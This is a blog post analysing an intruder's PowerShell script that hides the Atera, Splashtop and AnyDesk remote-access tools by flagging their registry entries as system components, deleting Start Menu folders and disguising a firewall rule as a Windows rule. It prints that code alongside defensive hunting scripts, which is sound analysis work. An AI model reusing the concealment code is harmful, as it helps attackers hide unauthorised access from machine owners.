Removing Traces of RMM Tools
Introduction
Fox_threatintel tweeted recently about an open directory on 91.215.85.18:9380/. I downloaded all the files from this directory and stumbled upon a ‘cleaner’ script, which we will examine in this short blog post. The original script is available on VirusTotal.
Find installed software
First, the script defines an array ($uninstallKeys) holding the two registry keys (native and WOW6432Node) that back the Apps & features list:
$uninstallKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
)
In our case, the script explicitly searches for the RMM products Atera and Splashtop:
$softwareNamesToFind = @("AteraAgent", "Splashtop Streamer")
The script then iterates over the subkeys of the two registry keys and compares each subkey's DisplayName value against the names in $softwareNamesToFind (Atera and Splashtop, see above):
$foundSoftwareKeys = @()   # initialisation not shown in the excerpt quoted here; without it "+=" concatenates strings
foreach ($uninstallKey in $uninstallKeys) {
    Get-ChildItem -Path $uninstallKey | ForEach-Object {
        # Each subkey is one installed product; DisplayName is what Apps & features shows
        $displayName = (Get-ItemProperty -Path $_.PSPath).DisplayName
        foreach ($softwareName in $softwareNamesToFind) {
            if ($displayName -eq $softwareName) {
                # "<name> found in <key>". Inside a double-quoted string only $_ is expanded,
                # so the literal text ".PSPath" ends up appended to the output (see Testing below).
                Write-Host "$softwareName найден в $_.PSPath"
                $foundSoftwareKeys += $_.PSPath
            }
        }
    }
}
If the script finds an installed Atera or Splashtop entry, it sets the value SystemComponent to 1 in that Uninstall subkey. This is the documented way to hide an entry from Programs and Features / Apps & features, and it also fools inventory scripts that filter on SystemComponent; the subkey itself, including InstallLocation and UninstallString, stays in the registry.
foreach ($softwareKeyPath in $foundSoftwareKeys) {
    # "Setting the SystemComponent value to 1 for <key>"
    Write-Host "Установка значения SystemComponent в 1 для $softwareKeyPath"
    Set-ItemProperty -Path $softwareKeyPath -Name "SystemComponent" -Value 1 -Type DWORD
}
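Seen from the defender's side, the hidden entries are easy to enumerate because the keys are still there. The following is an added hunting snippet (my own example, not part of the analysed script) that lists every Uninstall entry carrying SystemComponent=1 and flags those whose DisplayName matches an RMM product. The $RmmPatterns list is an assumption and should be extended for your environment; note that many legitimate MSI components (Visual C++ redistributable pieces, for instance) also set SystemComponent=1, so the LooksLikeRMM flag matters more than the raw count.

```powershell
# Added example (not from the analysed script): hunt for Uninstall entries that were
# hidden from "Apps & features" by setting SystemComponent=1.
# Assumptions: run in an elevated PowerShell on the host under examination; the
# $RmmPatterns default list is illustrative only.
function Find-HiddenUninstallEntry {
    param(
        [string[]]$RmmPatterns = @('*Atera*', '*Splashtop*', '*AnyDesk*')   # assumption
    )
    # Same two hives the cleaner script touches, plus the per-user hive it ignores
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
    )
    foreach ($key in $uninstallKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        foreach ($subKey in Get-ChildItem -Path $key) {
            $props = Get-ItemProperty -Path $subKey.PSPath
            # Hidden entries have SystemComponent = 1; the key itself is still present
            if ($props.SystemComponent -ne 1) { continue }
            $name = [string]$props.DisplayName
            $isRmm = $false
            foreach ($pattern in $RmmPatterns) {
                if ($name -like $pattern) { $isRmm = $true; break }
            }
            # InstallLocation and UninstallString usually still point into Program Files
            [pscustomobject]@{
                LooksLikeRMM    = $isRmm
                DisplayName     = $name
                Publisher       = $props.Publisher
                InstallDate     = $props.InstallDate
                InstallLocation = $props.InstallLocation
                UninstallString = $props.UninstallString
                KeyPath         = $subKey.Name
            }
        }
    }
}

# Usage: hidden RMM products first, the legitimate hidden components after them
Find-HiddenUninstallEntry |
    Sort-Object -Property LooksLikeRMM -Descending |
    Format-Table -AutoSize -Wrap
```

On a host under investigation, read the keys rather than flipping SystemComponent back to 0 as done in the test below; the hunt is read-only, and the UninstallString and InstallLocation values it prints are the next pivot to the product's files on disk.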
Removing folders
After hiding any matching entries from Apps & features, the script cleans up Start Menu folders. Note that the folder list also covers AnyDesk, which the registry search above did not look for:
$foldersToDelete = @(
    "*Atera*",
    "Anydesk Custom Client",
    "Splashtop Remote"
)
The code recursively searches the per-user and the all-users Start Menu "Programs" folders for items whose name matches one of the patterns in $foldersToDelete and removes every match, including its contents, with Remove-Item -Recurse -Force. Despite the variable names, both paths are Start Menu shortcut folders, so only shortcuts disappear; the actual installation directories under Program Files are not touched.
# Per-user and all-users Start Menu "Programs" folders (shortcuts only, not Program Files)
$startMenuPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs"
$programDataPath = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs"
foreach ($folderName in $foldersToDelete) {
    # -Filter accepts wildcards, so "*Atera*" matches any item with Atera in its name
    $startMenuItems = Get-ChildItem -Path "$startMenuPath" -Filter $folderName -Recurse
    $programDataItems = Get-ChildItem -Path "$programDataPath" -Filter $folderName -Recurse
    foreach ($item in $startMenuItems) {
        Remove-Item -Path $item.FullName -Force -Recurse
        Write-Host "Удалена папка $($item.Name) из папки AppData."       # "Removed <folder> from the AppData folder."
    }
    foreach ($item in $programDataItems) {
        Remove-Item -Path $item.FullName -Force -Recurse
        Write-Host "Удалена папка $($item.Name) из папки ProgramData."   # "Removed <folder> from the ProgramData folder."
    }
}
Remove traces in the Firewall Rules
Last, the script renames the Splashtop firewall rule with Set-NetFirewallRule so that it looks like the built-in Windows rule "Cast to Device streaming server (HTTP-Streaming-In)", and gives it the matching description. The comment inside the code reads, translated from Russian to English: Change the name and description of the rule to "Cast to Device streaming server (HTTP-Streaming-In)". Only the DisplayName and Description are rewritten; the rule's internal Name, its group and the program path it was created for remain unchanged:
# Collect the Name of every rule whose display name mentions Splashtop (may be more than one)
$splashtopRuleName = Get-NetFirewallRule | Where-Object { $_.DisplayName -like "*Splashtop*" } | Select-Object -ExpandProperty Name
# Изменить название и описание правила на "Cast to Device streaming server (HTTP-Streaming-In)"
# (Change the name and description of the rule to "Cast to Device streaming server (HTTP-Streaming-In)")
if ($splashtopRuleName) {
    # Only DisplayName and Description change; Name, Group and the program path stay as they were
    Set-NetFirewallRule -Name $splashtopRuleName -NewDisplayName "Cast to Device streaming server (HTTP-Streaming-In)" -Description "Inbound rule for the Cast to Device server to allow streaming using HTTP. [TCP 10247]"
    Write-Host "Название и описание правила брандмауэра для Splashtop Streamer изменены."   # "Firewall rule name and description for Splashtop Streamer changed."
} else {
    Write-Host "Правило брандмауэра для Splashtop Streamer не найдено."   # "Firewall rule for Splashtop Streamer not found."
}
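Because only DisplayName and Description are rewritten, the renamed rule still carries its original Name and still points at the Splashtop executable. The following added example (mine, not from the analysed script) joins every rule with its application filter via Get-NetFirewallApplicationFilter and reports two things: rules that share a display name with a rule whose program is a Windows component but themselves run something else, and rules whose program path matches an RMM install folder. The $RmmPathPatterns list and the heuristic "a built-in rule's program is 'System' or lives under %SystemRoot%" are assumptions.

```powershell
# Added example (not from the analysed script): find firewall rules whose display name
# impersonates a built-in Windows rule, or whose program lives in an RMM install folder.
# Assumptions: run elevated; the $RmmPathPatterns list is illustrative; "built-in" is
# approximated as "program is 'System' or lives under %SystemRoot%".
function Test-SystemProgram {
    param([string]$Program)
    if ([string]::IsNullOrWhiteSpace($Program) -or $Program -eq 'Any') { return $false }
    if ($Program -eq 'System') { return $true }
    # Filters often store paths like %SystemRoot%\system32\svchost.exe
    $expanded = [Environment]::ExpandEnvironmentVariables($Program)
    return $expanded -like "$env:SystemRoot\*"
}

function Find-ImpersonatingFirewallRule {
    param(
        [string[]]$RmmPathPatterns = @('*\Splashtop\*', '*\Atera*', '*\AnyDesk*')   # assumption
    )
    # Join each rule with its application filter so we see the program path, not just the name
    $entries = foreach ($rule in Get-NetFirewallRule) {
        $app = $rule | Get-NetFirewallApplicationFilter
        [pscustomobject]@{
            Name         = $rule.Name          # internal identifier, untouched by -NewDisplayName
            DisplayName  = $rule.DisplayName
            DisplayGroup = $rule.DisplayGroup
            Direction    = $rule.Direction
            Enabled      = $rule.Enabled
            Program      = $app.Program
        }
    }
    # Display names used by at least one rule whose program is a Windows component
    $builtinNames = $entries |
        Where-Object { Test-SystemProgram $_.Program } |
        Select-Object -ExpandProperty DisplayName -Unique

    foreach ($e in $entries) {
        $reasons = @()
        if ($e.Program -and $e.Program -ne 'Any' -and -not (Test-SystemProgram $e.Program) -and
            $builtinNames -contains $e.DisplayName) {
            $reasons += 'built-in display name, non-Windows program'
        }
        foreach ($pattern in $RmmPathPatterns) {
            if ($e.Program -like $pattern) { $reasons += "program matches $pattern"; break }
        }
        if ($reasons.Count -gt 0) {
            $e | Add-Member -NotePropertyName Reason -NotePropertyValue ($reasons -join '; ') -PassThru
        }
    }
}

# Usage: run elevated; review each hit's Name, DisplayGroup and Program by hand
Find-ImpersonatingFirewallRule | Format-List Name, DisplayName, DisplayGroup, Program, Reason
```

The first check works because the genuine "Cast to Device" rules already exist on a default Windows install with a program under %SystemRoot%, so a copycat display name attached to a program under Program Files stands out; the DisplayGroup column gives the same tell, since the renamed rule keeps whatever group it had before.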
Testing
I installed Splashtop Streamer on a test machine and ran the PowerShell code. I received the following output:
Splashtop Streamer найден в HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}.PSPath
Установка значения SystemComponent в 1 для Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}
Удалена папка Splashtop Remote из папки ProgramData.
Название и описание правила брандмауэра для Splashtop Streamer изменены.
Here is the translated version:
Splashtop Streamer found in HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}.PSPath
Setting the SystemComponent value to 1 for Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}
Removed Splashtop Remote folder from the ProgramData folder.
The name and description of the firewall rule for Splashtop Streamer have been changed.
Indeed, Splashtop is no longer visible in the Apps & features window. However, by toggling SystemComponent back to 0, the entry becomes visible again.
And yes, the firewall rule has changed too, but the app is still a giveaway, pointing to Splashtop :)
Conclusion
Honestly, I have no idea who came up with this script and thinks it covers enough tracks. Under certain circumstances an ordinary user could be fooled into believing that no RMM software is installed on the computer. For an investigator, however, these small changes make little difference: the Uninstall key is still there, merely flagged as a system component, with its InstallLocation and UninstallString intact; the product's files under Program Files, its service and its running process are untouched; the firewall rule keeps its original Name and program path; and the usual execution artifacts (Prefetch, Amcache, Shimcache, the event logs) record the agent regardless of what the GUI shows.